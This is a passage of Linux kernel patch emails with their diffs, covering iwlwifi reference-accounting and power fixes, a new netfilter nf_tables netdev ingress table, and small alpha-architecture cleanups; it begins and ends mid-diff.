Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 8e5be8d6f4a8..d8943384107e 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1164,7 +1164,8 @@ static void iwl_trans_pcie_d3_suspend(struct iwl_trans *trans, bool test) */ iwl_trans_pcie_tx_reset(trans); - iwl_pcie_set_pwr(trans, true); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + iwl_pcie_set_pwr(trans, true); } static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, @@ -1202,7 +1203,8 @@ static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, return ret; } - iwl_pcie_set_pwr(trans, false); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + iwl_pcie_set_pwr(trans, false); iwl_trans_pcie_tx_reset(trans); From c779273b37bec14c33feeab11c4d457a24bc64e0 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Sun, 19 Apr 2015 11:41:04 +0300 Subject: [PATCH 246/872] iwlwifi: mvm: fix ROC reference accounting commit b112889c5af8124 ("iwlwifi: mvm: add Aux ROC request/response flow") added aux ROC flow in addition to the existing ROC flow. While doing it, it moved the ROC reference release to a common work item, which is being called for both the ROC and aux ROC flows. This resulted in invalid reference accounting, as no reference was taken in case of aux ROC, while a reference was released on completion. Fix it by adding a reference for the aux ROC as well, and release only the relevant references on completion (according to the set bits). While at it, convert cancel_work_sync() to flush_work(), in order to make sure the references are being cleaned properly. Fixes: b112889c5af8 ("iwlwifi: mvm: add Aux ROC request/response flow") Signed-off-by: Eliad Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/debugfs.c | 5 +++-- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 1 + drivers/net/wireless/iwlwifi/mvm/time-event.c | 15 +++++++++------ 4 files changed, 14 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/iwlwifi/mvm/debugfs.c index 9ac04c1ea706..8c17b943cc6f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1356,6 +1356,7 @@ static ssize_t iwl_dbgfs_d0i3_refs_read(struct file *file, PRINT_MVM_REF(IWL_MVM_REF_UCODE_DOWN); PRINT_MVM_REF(IWL_MVM_REF_SCAN); PRINT_MVM_REF(IWL_MVM_REF_ROC); + PRINT_MVM_REF(IWL_MVM_REF_ROC_AUX); PRINT_MVM_REF(IWL_MVM_REF_P2P_CLIENT); PRINT_MVM_REF(IWL_MVM_REF_AP_IBSS); PRINT_MVM_REF(IWL_MVM_REF_USER); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index c131ce6d168a..ccbe5757dd26 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1410,7 +1410,7 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) * The work item could be running or queued if the * ROC time event stops just as we get here. */ - cancel_work_sync(&mvm->roc_done_wk); + flush_work(&mvm->roc_done_wk); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 6d332348dca6..dde83efd1a6c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -276,6 +276,7 @@ enum iwl_mvm_ref_type { IWL_MVM_REF_UCODE_DOWN, IWL_MVM_REF_SCAN, IWL_MVM_REF_ROC, + IWL_MVM_REF_ROC_AUX, IWL_MVM_REF_P2P_CLIENT, IWL_MVM_REF_AP_IBSS, IWL_MVM_REF_USER, diff --git a/drivers/net/wireless/iwlwifi/mvm/time-event.c b/drivers/net/wireless/iwlwifi/mvm/time-event.c index fd7b0d36f9a6..a7448cf01688 100644 --- a/drivers/net/wireless/iwlwifi/mvm/time-event.c +++ b/drivers/net/wireless/iwlwifi/mvm/time-event.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -108,12 +108,14 @@ void iwl_mvm_roc_done_wk(struct work_struct *wk) * in the case that the time event actually completed in the firmware * (which is handled in iwl_mvm_te_handle_notif). */ - if (test_and_clear_bit(IWL_MVM_STATUS_ROC_RUNNING, &mvm->status)) + if (test_and_clear_bit(IWL_MVM_STATUS_ROC_RUNNING, &mvm->status)) { queues |= BIT(IWL_MVM_OFFCHANNEL_QUEUE); - if (test_and_clear_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status)) + iwl_mvm_unref(mvm, IWL_MVM_REF_ROC); + } + if (test_and_clear_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status)) { queues |= BIT(mvm->aux_queue); - - iwl_mvm_unref(mvm, IWL_MVM_REF_ROC); + iwl_mvm_unref(mvm, IWL_MVM_REF_ROC_AUX); + } synchronize_net(); @@ -393,6 +395,7 @@ static int iwl_mvm_aux_roc_te_handle_notif(struct iwl_mvm *mvm, } else if (le32_to_cpu(notif->action) == TE_V2_NOTIF_HOST_EVENT_START) { set_bit(IWL_MVM_STATUS_ROC_AUX_RUNNING, &mvm->status); te_data->running = true; + iwl_mvm_ref(mvm, IWL_MVM_REF_ROC_AUX); ieee80211_ready_on_channel(mvm->hw); /* Start TE */ } else { IWL_DEBUG_TE(mvm, From 2f06550b3b0e26f54045337e34ec2a1b666bb6c6 Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Sun, 24 May 2015 01:00:41 +0200 Subject: [PATCH 247/872] netfilter: remove unused comefrom hookmask argument Signed-off-by: Florian Westphal Signed-off-by: Pablo Neira Ayuso --- net/ipv4/netfilter/ip_tables.c | 4 +--- net/ipv6/netfilter/ip6_tables.c | 4 +--- 2 files changed, 2 insertions(+), 6 deletions(-) diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c index c69db7fa25ee..583779fc3425 100644 --- a/net/ipv4/netfilter/ip_tables.c +++ b/net/ipv4/netfilter/ip_tables.c @@ -1441,7 +1441,6 @@ static int compat_find_calc_match(struct xt_entry_match *m, const char *name, const struct ipt_ip *ip, - unsigned int hookmask, int *size) { struct xt_match *match; @@ -1510,8 +1509,7 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e, entry_offset = (void *)e - (void *)base; j = 0; xt_ematch_foreach(ematch, e) { - ret = compat_find_calc_match(ematch, name, - &e->ip, e->comefrom, &off); + ret = compat_find_calc_match(ematch, name, &e->ip, &off); if (ret != 0) goto release_matches; ++j; diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c index 1a732a1d3c8e..d54f04970ee0 100644 --- a/net/ipv6/netfilter/ip6_tables.c +++ b/net/ipv6/netfilter/ip6_tables.c @@ -1456,7 +1456,6 @@ static int compat_find_calc_match(struct xt_entry_match *m, const char *name, const struct ip6t_ip6 *ipv6, - unsigned int hookmask, int *size) { struct xt_match *match; @@ -1525,8 +1524,7 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e, entry_offset = (void *)e - (void *)base; j = 0; xt_ematch_foreach(ematch, e) { - ret = compat_find_calc_match(ematch, name, - &e->ipv6, e->comefrom, &off); + ret = compat_find_calc_match(ematch, name, &e->ipv6, &off); if (ret != 0) goto release_matches; ++j; From 529985de202276d0d3455d16d284d72efc357d98 Mon Sep 17 00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:12 +0200 Subject: [PATCH 248/872] netfilter: default CONFIG_NETFILTER_INGRESS to y Useful to compile-test all options. Suggested-by: Alexei Stavoroitov Signed-off-by: Pablo Neira Ayuso --- net/netfilter/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/net/netfilter/Kconfig b/net/netfilter/Kconfig index db1c674397ad..9a89e7c67d78 100644 --- a/net/netfilter/Kconfig +++ b/net/netfilter/Kconfig @@ -3,6 +3,7 @@ menu "Core Netfilter Configuration" config NETFILTER_INGRESS bool "Netfilter ingress support" + default y select NET_INGRESS help This allows you to classify packets from ingress using the Netfilter From ebddf1a8d78aa3436353fae75c4396e50cb2d6cf Mon Sep 17 00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:20 +0200 Subject: [PATCH 249/872] netfilter: nf_tables: allow to bind table to net_device This patch adds the internal NFT_AF_NEEDS_DEV flag to indicate that you must attach this table to a net_device. This change is required by the follow up patch that introduces the new netdev table. Signed-off-by: Pablo Neira Ayuso --- include/net/netfilter/nf_tables.h | 8 +++++ include/uapi/linux/netfilter/nf_tables.h | 2 ++ net/netfilter/nf_tables_api.c | 46 +++++++++++++++++++++--- 3 files changed, 51 insertions(+), 5 deletions(-) diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h index e6bcf55dcf20..3d6f48ca40a7 100644 --- a/include/net/netfilter/nf_tables.h +++ b/include/net/netfilter/nf_tables.h @@ -819,6 +819,7 @@ unsigned int nft_do_chain(struct nft_pktinfo *pkt, * @use: number of chain references to this table * @flags: table flag (see enum nft_table_flags) * @name: name of the table + * @dev: this table is bound to this device (if any) */ struct nft_table { struct list_head list; @@ -828,6 +829,11 @@ struct nft_table { u32 use; u16 flags; char name[NFT_TABLE_MAXNAMELEN]; + struct net_device *dev; +}; + +enum nft_af_flags { + NFT_AF_NEEDS_DEV = (1 << 0), }; /** @@ -838,6 +844,7 @@ struct nft_table { * @nhooks: number of hooks in this family * @owner: module owner * @tables: used internally + * @flags: family flags * @nops: number of hook ops in this family * @hook_ops_init: initialization function for chain hook ops * @hooks: hookfn overrides for packet validation @@ -848,6 +855,7 @@ struct nft_af_info { unsigned int nhooks; struct module *owner; struct list_head tables; + u32 flags; unsigned int nops; void (*hook_ops_init)(struct nf_hook_ops *, unsigned int); diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h index 5fa1cd04762e..89a671e0f5e7 100644 --- a/include/uapi/linux/netfilter/nf_tables.h +++ b/include/uapi/linux/netfilter/nf_tables.h @@ -146,12 +146,14 @@ enum nft_table_flags { * @NFTA_TABLE_NAME: name of the table (NLA_STRING) * @NFTA_TABLE_FLAGS: bitmask of enum nft_table_flags (NLA_U32) * @NFTA_TABLE_USE: number of chains in this table (NLA_U32) + * @NFTA_TABLE_DEV: net device name (NLA_STRING) */ enum nft_table_attributes { NFTA_TABLE_UNSPEC, NFTA_TABLE_NAME, NFTA_TABLE_FLAGS, NFTA_TABLE_USE, + NFTA_TABLE_DEV, __NFTA_TABLE_MAX }; #define NFTA_TABLE_MAX (__NFTA_TABLE_MAX - 1) diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c index ad9d11fb29fd..2fd4e99dd074 100644 --- a/net/netfilter/nf_tables_api.c +++ b/net/netfilter/nf_tables_api.c @@ -399,6 +399,8 @@ static const struct nla_policy nft_table_policy[NFTA_TABLE_MAX + 1] = { [NFTA_TABLE_NAME] = { .type = NLA_STRING, .len = NFT_TABLE_MAXNAMELEN - 1 }, [NFTA_TABLE_FLAGS] = { .type = NLA_U32 }, + [NFTA_TABLE_DEV] = { .type = NLA_STRING, + .len = IFNAMSIZ - 1 }, }; static int nf_tables_fill_table_info(struct sk_buff *skb, struct net *net, @@ -423,6 +425,10 @@ static int nf_tables_fill_table_info(struct sk_buff *skb, struct net *net, nla_put_be32(skb, NFTA_TABLE_USE, htonl(table->use))) goto nla_put_failure; + if (table->dev && + nla_put_string(skb, NFTA_TABLE_DEV, table->dev->name)) + goto nla_put_failure; + nlmsg_end(skb, nlh); return 0; @@ -608,6 +614,11 @@ static int nf_tables_updtable(struct nft_ctx *ctx) if (flags == ctx->table->flags) return 0; + if ((ctx->afi->flags & NFT_AF_NEEDS_DEV) && + ctx->nla[NFTA_TABLE_DEV] && + nla_strcmp(ctx->nla[NFTA_TABLE_DEV], ctx->table->dev->name)) + return -EOPNOTSUPP; + trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE, sizeof(struct nft_trans_table)); if (trans == NULL) @@ -645,6 +656,7 @@ static int nf_tables_newtable(struct sock *nlsk, struct sk_buff *skb, struct nft_table *table; struct net *net = sock_net(skb->sk); int family = nfmsg->nfgen_family; + struct net_device *dev = NULL; u32 flags = 0; struct nft_ctx ctx; int err; @@ -679,30 +691,50 @@ static int nf_tables_newtable(struct sock *nlsk, struct sk_buff *skb, return -EINVAL; } + if (afi->flags & NFT_AF_NEEDS_DEV) { + char ifname[IFNAMSIZ]; + + if (!nla[NFTA_TABLE_DEV]) + return -EOPNOTSUPP; + + nla_strlcpy(ifname, nla[NFTA_TABLE_DEV], IFNAMSIZ); + dev = dev_get_by_name(net, ifname); + if (!dev) + return -ENOENT; + } else if (nla[NFTA_TABLE_DEV]) { + return -EOPNOTSUPP; + } + + err = -EAFNOSUPPORT; if (!try_module_get(afi->owner)) - return -EAFNOSUPPORT; + goto err1; err = -ENOMEM; table = kzalloc(sizeof(*table), GFP_KERNEL); if (table == NULL) - goto err1; + goto err2; nla_strlcpy(table->name, name, NFT_TABLE_MAXNAMELEN); INIT_LIST_HEAD(&table->chains); INIT_LIST_HEAD(&table->sets); table->flags = flags; + table->dev = dev; nft_ctx_init(&ctx, skb, nlh, afi, table, NULL, nla); err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE); if (err < 0) - goto err2; + goto err3; list_add_tail_rcu(&table->list, &afi->tables); return 0; -err2: +err3: kfree(table); -err1: +err2: module_put(afi->owner); +err1: + if (dev != NULL) + dev_put(dev); + return err; } @@ -806,6 +838,9 @@ static void nf_tables_table_destroy(struct nft_ctx *ctx) { BUG_ON(ctx->table->use > 0); + if (ctx->table->dev) + dev_put(ctx->table->dev); + kfree(ctx->table); module_put(ctx->afi->owner); } @@ -1361,6 +1396,7 @@ static int nf_tables_newchain(struct sock *nlsk, struct sk_buff *skb, ops->priority = priority; ops->priv = chain; ops->hook = afi->hooks[ops->hooknum]; + ops->dev = table->dev; if (hookfn) ops->hook = hookfn; if (afi->hook_ops_init) From ed6c4136f1571bd6ab362afc3410905a8a69ca42 Mon Sep 17 00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:40 +0200 Subject: [PATCH 250/872] netfilter: nf_tables: add netdev table to filter from ingress This allows us to create netdev tables that contain ingress chains. Use skb_header_pointer() as we may see shared sk_buffs at this stage. This change provides access to the existing nf_tables features from the ingress hook. Signed-off-by: Pablo Neira Ayuso --- include/net/netns/nftables.h | 1 + net/netfilter/Kconfig | 5 + net/netfilter/Makefile | 1 + net/netfilter/nf_tables_netdev.c | 183 +++++++++++++++++++++++++++++++ 4 files changed, 190 insertions(+) create mode 100644 net/netfilter/nf_tables_netdev.c diff --git a/include/net/netns/nftables.h b/include/net/netns/nftables.h index eee608b12cc9..c80781146019 100644 --- a/include/net/netns/nftables.h +++ b/include/net/netns/nftables.h @@ -13,6 +13,7 @@ struct netns_nftables { struct nft_af_info *inet; struct nft_af_info *arp; struct nft_af_info *bridge; + struct nft_af_info *netdev; unsigned int base_seq; u8 gencursor; }; diff --git a/net/netfilter/Kconfig b/net/netfilter/Kconfig index 9a89e7c67d78..bd5aaebaa9a2 100644 --- a/net/netfilter/Kconfig +++ b/net/netfilter/Kconfig @@ -456,6 +456,11 @@ config NF_TABLES_INET help This option enables support for a mixed IPv4/IPv6 "inet" table. +config NF_TABLES_NETDEV + tristate "Netfilter nf_tables netdev tables support" + help + This option enables support for the "netdev" table. + config NFT_EXTHDR tristate "Netfilter nf_tables IPv6 exthdr module" help diff --git a/net/netfilter/Makefile b/net/netfilter/Makefile index a87d8b8ec730..70d026d46fe7 100644 --- a/net/netfilter/Makefile +++ b/net/netfilter/Makefile @@ -75,6 +75,7 @@ nf_tables-objs += nft_bitwise.o nft_byteorder.o nft_payload.o obj-$(CONFIG_NF_TABLES) += nf_tables.o obj-$(CONFIG_NF_TABLES_INET) += nf_tables_inet.o +obj-$(CONFIG_NF_TABLES_NETDEV) += nf_tables_netdev.o obj-$(CONFIG_NFT_COMPAT) += nft_compat.o obj-$(CONFIG_NFT_EXTHDR) += nft_exthdr.o obj-$(CONFIG_NFT_META) += nft_meta.o diff --git a/net/netfilter/nf_tables_netdev.c b/net/netfilter/nf_tables_netdev.c new file mode 100644 index 000000000000..04cb17057f46 --- /dev/null +++ b/net/netfilter/nf_tables_netdev.c @@ -0,0 +1,183 @@ +/* + * Copyright (c) 2015 Pablo Neira Ayuso + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 as + * published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include +#include + +static inline void +nft_netdev_set_pktinfo_ipv4(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, struct sk_buff *skb, + const struct nf_hook_state *state) +{ + struct iphdr *iph, _iph; + u32 len, thoff; + + nft_set_pktinfo(pkt, ops, skb, state); + + iph = skb_header_pointer(skb, skb_network_offset(skb), sizeof(*iph), + &_iph); + if (!iph) + return; + + iph = ip_hdr(skb); + if (iph->ihl < 5 || iph->version != 4) + return; + + len = ntohs(iph->tot_len); + thoff = iph->ihl * 4; + if (skb->len < len) + return; + else if (len < thoff) + return; + + pkt->tprot = iph->protocol; + pkt->xt.thoff = thoff; + pkt->xt.fragoff = ntohs(iph->frag_off) & IP_OFFSET; +} + +static inline void +__nft_netdev_set_pktinfo_ipv6(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, + struct sk_buff *skb, + const struct nf_hook_state *state) +{ +#if IS_ENABLED(CONFIG_IPV6) + struct ipv6hdr *ip6h, _ip6h; + unsigned int thoff = 0; + unsigned short frag_off; + int protohdr; + u32 pkt_len; + + ip6h = skb_header_pointer(skb, skb_network_offset(skb), sizeof(*ip6h), + &_ip6h); + if (!ip6h) + return; + + if (ip6h->version != 6) + return; + + pkt_len = ntohs(ip6h->payload_len); + if (pkt_len + sizeof(*ip6h) > skb->len) + return; + + protohdr = ipv6_find_hdr(pkt->skb, &thoff, -1, &frag_off, NULL); + if (protohdr < 0) + return; + + pkt->tprot = protohdr; + pkt->xt.thoff = thoff; + pkt->xt.fragoff = frag_off; +#endif +} + +static inline void nft_netdev_set_pktinfo_ipv6(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, + struct sk_buff *skb, + const struct nf_hook_state *state) +{ + nft_set_pktinfo(pkt, ops, skb, state); + __nft_netdev_set_pktinfo_ipv6(pkt, ops, skb, state); +} + +static unsigned int +nft_do_chain_netdev(const struct nf_hook_ops *ops, struct sk_buff *skb, + const struct nf_hook_state *state) +{ + struct nft_pktinfo pkt; + + switch (eth_hdr(skb)->h_proto) { + case htons(ETH_P_IP): + nft_netdev_set_pktinfo_ipv4(&pkt, ops, skb, state); + break; + case htons(ETH_P_IPV6): + nft_netdev_set_pktinfo_ipv6(&pkt, ops, skb, state); + break; + default: + nft_set_pktinfo(&pkt, ops, skb, state); + break; + } + + return nft_do_chain(&pkt, ops); +} + +static struct nft_af_info nft_af_netdev __read_mostly = { + .family = NFPROTO_NETDEV, + .nhooks = NF_NETDEV_NUMHOOKS, + .owner = THIS_MODULE, + .flags = NFT_AF_NEEDS_DEV, + .nops = 1, + .hooks = { + [NF_NETDEV_INGRESS] = nft_do_chain_netdev, + }, +}; + +static int nf_tables_netdev_init_net(struct net *net) +{ + net->nft.netdev = kmalloc(sizeof(struct nft_af_info), GFP_KERNEL); + if (net->nft.netdev == NULL) + return -ENOMEM; + + memcpy(net->nft.netdev, &nft_af_netdev, sizeof(nft_af_netdev)); + + if (nft_register_afinfo(net, net->nft.netdev) < 0) + goto err; + + return 0; +err: + kfree(net->nft.netdev); + return -ENOMEM; +} + +static void nf_tables_netdev_exit_net(struct net *net) +{ + nft_unregister_afinfo(net->nft.netdev); + kfree(net->nft.netdev); +} + +static struct pernet_operations nf_tables_netdev_net_ops = { + .init = nf_tables_netdev_init_net, + .exit = nf_tables_netdev_exit_net, +}; + +static const struct nf_chain_type nft_filter_chain_netdev = { + .name = "filter", + .type = NFT_CHAIN_T_DEFAULT, + .family = NFPROTO_NETDEV, + .owner = THIS_MODULE, + .hook_mask = (1 << NF_NETDEV_INGRESS), +}; + +static int __init nf_tables_netdev_init(void) +{ + int ret; + + nft_register_chain_type(&nft_filter_chain_netdev); + ret = register_pernet_subsys(&nf_tables_netdev_net_ops); + if (ret < 0) + nft_unregister_chain_type(&nft_filter_chain_netdev); + + return ret; +} + +static void __exit nf_tables_netdev_exit(void) +{ + unregister_pernet_subsys(&nf_tables_netdev_net_ops); + nft_unregister_chain_type(&nft_filter_chain_netdev); +} + +module_init(nf_tables_netdev_init); +module_exit(nf_tables_netdev_exit); + +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("Pablo Neira Ayuso "); +MODULE_ALIAS_NFT_FAMILY(5); /* NFPROTO_NETDEV */ From ebdd117e5aab748d06f872860f36a0b09d8aadfc Mon Sep 17 00:00:00 2001 From: Yijing Wang Date: Thu, 8 Aug 2013 21:13:54 +0800 Subject: [PATCH 251/872] alpha: clean up unnecessary MSI/MSI-X capability find PCI core will initialize device MSI/MSI-X capability in pci_msi_init_pci_dev(). So device driver should use pci_dev->msi_cap/msix_cap to determine whether the device support MSI/MSI-X instead of using pci_find_capability(pci_dev, PCI_CAP_ID_MSI/MSIX). Access to PCIe device config space again will consume more time. Signed-off-by: Yijing Wang Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: Phil Carmody Cc: linux-alpha@vger.kernel.org Signed-off-by: Matt Turner --- arch/alpha/kernel/sys_marvel.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/alpha/kernel/sys_marvel.c b/arch/alpha/kernel/sys_marvel.c index f21d61fab678..24e41bd7d3c9 100644 --- a/arch/alpha/kernel/sys_marvel.c +++ b/arch/alpha/kernel/sys_marvel.c @@ -331,7 +331,7 @@ marvel_map_irq(const struct pci_dev *cdev, u8 slot, u8 pin) pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &intline); irq = intline; - msi_loc = pci_find_capability(dev, PCI_CAP_ID_MSI); + msi_loc = dev->msi_cap; msg_ctl = 0; if (msi_loc) pci_read_config_word(dev, msi_loc + PCI_MSI_FLAGS, &msg_ctl); From ae6d78d78a20c351164d371e94b2aadc54536b40 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Mon, 25 Nov 2013 09:55:22 +0100 Subject: [PATCH 252/872] alpha: Remove #include from Everything in arch/alpha/include/uapi/asm/types.h is protected by "#ifndef __KERNEL__", so it's unused for kernelspace. Signed-off-by: Geert Uytterhoeven Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Matt Turner --- arch/alpha/include/asm/types.h | 1 - 1 file changed, 1 deletion(-) diff --git a/arch/alpha/include/asm/types.h b/arch/alpha/include/asm/types.h index f61e1a56c378..4cb4b6d3452c 100644 --- a/arch/alpha/include/asm/types.h +++ b/arch/alpha/include/asm/types.h @@ -2,6 +2,5 @@ #define _ALPHA_TYPES_H #include -#include #endif /* _ALPHA_TYPES_H */ From 614aab527b3d48f481854c215251471407473599 Mon Sep 17 00:00:00 2001 From: Jiang Liu Date: Mon, 16 Dec 2013 00:36:25 +0800 Subject: [PATCH 253/872] smp, alpha: kill SMP single function call interrupt Commit 9a46ad6d6df3b54 "smp: make smp_call_function_many() use logic similar to smp_call_function_single()" has unified the way to handle single and multiple cross-CPU function calls. Now only one interrupt is needed for architecture specific code to support generic SMP function call interfaces, so kill the redundant single function call interrupt. Cc: Andrew Morton Cc: Shaohua Li Cc: Peter Zijlstra Cc: Ingo Molnar Cc: Steven Rostedt Cc: Jiri Kosina Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Jiang Liu Signed-off-by: Matt Turner --- arch/alpha/kernel/smp.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/arch/alpha/kernel/smp.c b/arch/alpha/kernel/smp.c index 99ac36d5de4e..2f24447fef92 100644 --- a/arch/alpha/kernel/smp.c +++ b/arch/alpha/kernel/smp.c @@ -63,7 +63,6 @@ static struct { enum ipi_message_type { IPI_RESCHEDULE, IPI_CALL_FUNC, - IPI_CALL_FUNC_SINGLE, IPI_CPU_STOP, }; @@ -506,7 +505,6 @@ setup_profiling_timer(unsigned int multiplier) return -EINVAL; } - static void send_ipi_message(const struct cpumask *to_whom, enum ipi_message_type operation) { @@ -552,10 +550,6 @@ handle_ipi(struct pt_regs *regs) generic_smp_call_function_interrupt(); break; - case IPI_CALL_FUNC_SINGLE: - generic_smp_call_function_single_interrupt(); - break; - case IPI_CPU_STOP: halt(); @@ -606,7 +600,7 @@ void arch_send_call_function_ipi_mask(const struct cpumask *mask) void arch_send_call_function_single_ipi(int cpu) { - send_ipi_message(cpumask_of(cpu), IPI_CALL_FUNC_SINGLE); + send_ipi_message(cpumask_of(cpu), IPI_CALL_FUNC); } static void From 11447c7c4f046350f63693e2c935e6b33a1b62a8 Mon Sep 17 00:00:00 2001 From: Paul Gortmaker Date: Fri, 10 Jan 2014 17:02:02 -0500 Subject: [PATCH 254/872] alpha: don't use module_init for non-modular core code The srm console is always built in. It will never be modular, so using module_init as an alias for __initcall is rather misleading. Fix this up now, so that we can relocate module_init from init.h into module.h in the future. If we don't do this, we'd have to add module.h to obviously non-modular code, and that would be a worse thing. Direct use of __initcall is discouraged, vs prioritized ones. Use of device_initcall is consistent with what __initcall maps onto, and hence does not change the init order, making the impact of this change zero. Should someone with real hardware for boot testing want to change it later to arch_initcall or console_initcall, they can do that at a later date. Reviewed-by: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Paul Gortmaker Signed-off-by: Matt Turner --- arch/alpha/kernel/srmcons.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/alpha/kernel/srmcons.c b/arch/alpha/kernel/srmcons.c index 6f01d9ad7b81..72b59511e59a 100644 --- a/arch/alpha/kernel/srmcons.c +++ b/arch/alpha/kernel/srmcons.c @@ -237,8 +237,7 @@ srmcons_init(void) return -ENODEV; } - -module_init(srmcons_init); +device_initcall(srmcons_init); /* From 0bc25674a4a2ec32140e2f3f0b863cf87e566ad4 Mon Sep 17 00:00:00 2001 From: Paul Gortmaker Date: Tue, 21 Jan 2014 16:22:40 -0500 Subject: [PATCH 255/872] alpha: delete non-required instances of None of these files are actually using any __init type directives and hence don't need to include . Most are just a left over from __devinit and __cpuinit removal, or simply due to code getting copied from one driver to the next. Acked-by: Richard Henderson Cc: Ivan Kokshaysky Cc: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Paul Gortmaker Signed-off-by: Matt Turner --- arch/alpha/kernel/err_ev6.c | 1 - arch/alpha/kernel/irq.c | 1 - arch/alpha/kernel/traps.c | 1 - arch/alpha/oprofile/op_model_ev4.c | 1 - arch/alpha/oprofile/op_model_ev5.c | 1 - arch/alpha/oprofile/op_model_ev6.c | 1 - arch/alpha/oprofile/op_model_ev67.c | 1 - 7 files changed, 7 deletions(-) diff --git a/arch/alpha/kernel/err_ev6.c b/arch/alpha/kernel/err_ev6.c index 253cf1a87481..51267ac5729b 100644 --- a/arch/alpha/kernel/err_ev6.c +++ b/arch/alpha/kernel/err_ev6.c @@ -6,7 +6,6 @@ * Error handling code supporting Alpha systems */ -#include #include #include diff --git a/arch/alpha/kernel/irq.c b/arch/alpha/kernel/irq.c index 7b2be251c30f..51f2c8654253 100644 --- a/arch/alpha/kernel/irq.c +++ b/arch/alpha/kernel/irq.c @@ -19,7 +19,6 @@ #include #include #include -#include #include #include #include diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c index 9c4c189eb22f..74aceead06e9 100644 --- a/arch/alpha/kernel/traps.c +++ b/arch/alpha/kernel/traps.c @@ -14,7 +14,6 @@ #include #include #include -#include #include #include diff --git 